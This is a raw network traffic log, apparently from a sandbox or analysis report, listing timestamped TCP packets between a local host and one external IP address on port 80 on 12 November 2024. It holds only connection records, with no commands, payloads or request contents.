                                                                                                            Nov 12, 2024 00:43:17.670949936 CET4991780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:17.675697088 CET804991737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.026443958 CET4991780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:18.031367064 CET804991737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.031379938 CET804991737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.031392097 CET804991737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.261251926 CET804991737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.307035923 CET4991780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:18.349324942 CET804991737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.477535009 CET4991780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:18.478283882 CET4992880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:18.483901024 CET804991737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.483948946 CET4991780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:18.484734058 CET804992837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.484807014 CET4992880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:18.484925032 CET4992880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:18.491442919 CET804992837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.838515043 CET4992880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:18.845047951 CET804992837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.845062017 CET804992837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:18.845069885 CET804992837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.070192099 CET804992837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.150969028 CET804992837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.151036978 CET4992880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:19.383294106 CET4992880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:19.384738922 CET4993480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:19.390234947 CET804993437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.390326023 CET4993480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:19.390531063 CET4993480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:19.391963959 CET804992837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.392014980 CET4992880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:19.396156073 CET804993437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.744733095 CET4993480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:19.751707077 CET804993437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.752800941 CET804993437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.752863884 CET804993437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:19.976643085 CET804993437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.052309036 CET804993437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.052361965 CET4993480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.120569944 CET4993480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.120914936 CET4994080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.127641916 CET804993437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.127705097 CET4993480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.127741098 CET804994037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.127805948 CET4994080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.127927065 CET4994080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.134985924 CET804994037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.191631079 CET4994080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.192707062 CET4994180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.199812889 CET804994137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.199875116 CET4994180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.199984074 CET4994180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.207012892 CET804994137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.240856886 CET804994037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.546144962 CET804994037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.546191931 CET4994080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.557158947 CET4994180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.562015057 CET804994137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.562026978 CET804994137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.562037945 CET804994137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.785913944 CET804994137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.853940964 CET4994180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.866019964 CET804994137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.994196892 CET4994180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.995069027 CET4994780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.999489069 CET804994137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.999547005 CET4994180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:20.999886990 CET804994737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:20.999974012 CET4994780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:21.000056028 CET4994780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:21.004802942 CET804994737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:21.354265928 CET4994780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:21.359150887 CET804994737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:21.359164000 CET804994737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:21.359183073 CET804994737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:21.573817015 CET804994737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:21.644499063 CET804994737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:21.644573927 CET4994780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:21.781188011 CET4995680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:21.786149979 CET804995637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:21.786215067 CET4995680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:21.786375046 CET4995680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:21.791868925 CET804995637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.152319908 CET4995680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:22.157195091 CET804995637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.157270908 CET804995637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.157282114 CET804995637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.351680040 CET804995637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.429994106 CET804995637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.430993080 CET4995680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:22.561909914 CET4995680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:22.563076973 CET4996280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:22.567024946 CET804995637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.567362070 CET4995680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:22.567840099 CET804996237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.567933083 CET4996280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:22.568059921 CET4996280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:22.573489904 CET804996237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.916539907 CET4996280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:22.921662092 CET804996237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.921677113 CET804996237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:22.921688080 CET804996237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.134171963 CET804996237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.215133905 CET804996237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.215182066 CET4996280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:23.340044022 CET4996280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:23.340723038 CET4996980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:23.345207930 CET804996237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.345264912 CET4996280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:23.345467091 CET804996937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.345606089 CET4996980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:23.346074104 CET4996980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:23.350830078 CET804996937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.697978973 CET4996980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:23.702837944 CET804996937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.702893019 CET804996937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.702939987 CET804996937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:23.929660082 CET804996937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.010251999 CET4996980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:24.011857986 CET804996937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.149003983 CET4996980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:24.150191069 CET4997680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:24.156368017 CET804996937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.156449080 CET4996980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:24.157075882 CET804997637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.157507896 CET4997680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:24.160795927 CET4997680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:24.167582989 CET804997637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.510608912 CET4997680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:24.517426014 CET804997637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.517533064 CET804997637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.517543077 CET804997637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.724399090 CET804997637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.808634043 CET804997637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:24.808693886 CET4997680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.198287010 CET4997680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.199139118 CET4998280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.203515053 CET804997637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.203572035 CET4997680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.204183102 CET804998237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.204251051 CET4998280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.204365969 CET4998280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.209533930 CET804998237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.219573021 CET4998380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.224426985 CET804998337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.224478006 CET4998380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.224643946 CET4998380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.229610920 CET804998337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.557188988 CET4998280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.572824001 CET4998380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.609735966 CET804998237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.609757900 CET804998237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.609994888 CET804998337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.610049963 CET804998337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.610260010 CET804998337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.787457943 CET804998237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.807571888 CET804998337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.854186058 CET4998280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.862643957 CET804998237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.863482952 CET4998380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.870398998 CET804998337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.872127056 CET4998380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.991144896 CET4998280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.991714001 CET4999180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.997746944 CET804998237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.997865915 CET804999137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:25.997924089 CET4998280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.997965097 CET4999180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:25.998059034 CET4999180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:26.004511118 CET804999137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:26.354089022 CET4999180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:26.358897924 CET804999137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:26.358911991 CET804999137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:26.358921051 CET804999137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:26.573081970 CET804999137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:26.650851011 CET4999180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:26.657941103 CET804999137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:26.790337086 CET4999780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:26.795183897 CET804999737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:26.795253992 CET4999780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:26.795336008 CET4999780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:26.800178051 CET804999737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:26.854088068 CET4999180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.150971889 CET4999780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.158258915 CET804999737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:27.158272982 CET804999737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:27.158284903 CET804999737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:27.360789061 CET804999737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:27.434987068 CET804999737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:27.435102940 CET4999780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.794425011 CET4999180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.801393032 CET4999780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.802299976 CET5000380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.806437969 CET804999737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:27.806488991 CET4999780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.807069063 CET805000337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:27.807133913 CET5000380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.807390928 CET5000380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:27.812139988 CET805000337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.166613102 CET5000380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:28.172995090 CET805000337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.173010111 CET805000337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.173022032 CET805000337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.372302055 CET805000337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.449702978 CET805000337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.449748039 CET5000380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:28.577450037 CET5000380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:28.578696012 CET5001480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:28.582788944 CET805000337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.582835913 CET5000380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:28.583430052 CET805001437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.583484888 CET5001480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:28.583590984 CET5001480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:28.588325024 CET805001437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.932245970 CET5001480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:28.937135935 CET805001437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.937146902 CET805001437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:28.937156916 CET805001437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.166654110 CET805001437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.244662046 CET5001480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:29.247385979 CET805001437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.354006052 CET5001480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:29.369317055 CET5001480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:29.374722004 CET805001437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.374773979 CET5001480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:29.392879963 CET5002080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:29.397802114 CET805002037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.397874117 CET5002080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:29.398050070 CET5002080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:29.402867079 CET805002037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.744832039 CET5002080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:29.749661922 CET805002037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.749677896 CET805002037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.749687910 CET805002037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:29.962815046 CET805002037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.041573048 CET5002080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.046741962 CET805002037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.150928020 CET5002080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.465215921 CET5002080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.466475010 CET5002680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.576128006 CET805002637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.576206923 CET5002680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.576297045 CET805002037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.576348066 CET5002080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.576374054 CET5002680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.581213951 CET805002637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.870857000 CET5003080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.870959997 CET5002680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.878083944 CET805003037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.878163099 CET5003080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.878315926 CET5003080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.883534908 CET805003037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.920847893 CET805002637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.984075069 CET805002637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:30.984147072 CET5002680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:30.992644072 CET5003180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.001707077 CET805003137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.001791954 CET5003180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.001894951 CET5003180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.006694078 CET805003137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.229096889 CET5003080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.233937979 CET805003037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.234113932 CET805003037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.354207039 CET5003180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.359088898 CET805003137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.359101057 CET805003137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.359110117 CET805003137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.445077896 CET805003037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.516097069 CET805003037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.516141891 CET5003080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.591758013 CET805003137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.675065041 CET805003137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.675132036 CET5003180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.812494040 CET5003180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.812527895 CET5003080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.815705061 CET5003680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.818094969 CET805003137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.818146944 CET5003180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.818411112 CET805003037.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.818448067 CET5003080192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.820492983 CET805003637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:31.821553946 CET5003680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.821666002 CET5003680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:31.826431036 CET805003637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:32.166735888 CET5003680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:32.171627045 CET805003637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:32.171665907 CET805003637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:32.171677113 CET805003637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:32.405672073 CET805003637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:32.488152027 CET805003637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:32.488234997 CET5003680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:32.638370991 CET5004280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:32.643367052 CET805004237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:32.643806934 CET5004280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:32.643918991 CET5004280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:32.648716927 CET805004237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.002168894 CET5004280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.007119894 CET805004237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.007142067 CET805004237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.007150888 CET805004237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.226784945 CET805004237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.300589085 CET805004237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.301568985 CET5004280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.427418947 CET5003680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.432123899 CET5004280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.432818890 CET5004980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.437599897 CET805004237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.437658072 CET5004280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.437884092 CET805004937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.437941074 CET5004980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.438062906 CET5004980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.442843914 CET805004937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.792169094 CET5004980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:33.797231913 CET805004937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.797245026 CET805004937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:33.797255039 CET805004937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:34.021536112 CET805004937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:34.096337080 CET805004937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:34.097296953 CET5004980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:34.218702078 CET5004980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:34.221513987 CET5005580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:34.224320889 CET805004937.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:34.224370956 CET5004980192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:34.226452112 CET805005537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:43:34.226989031 CET5005580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:43:34.227087021 CET5005580192.168.2.437.44.238.250
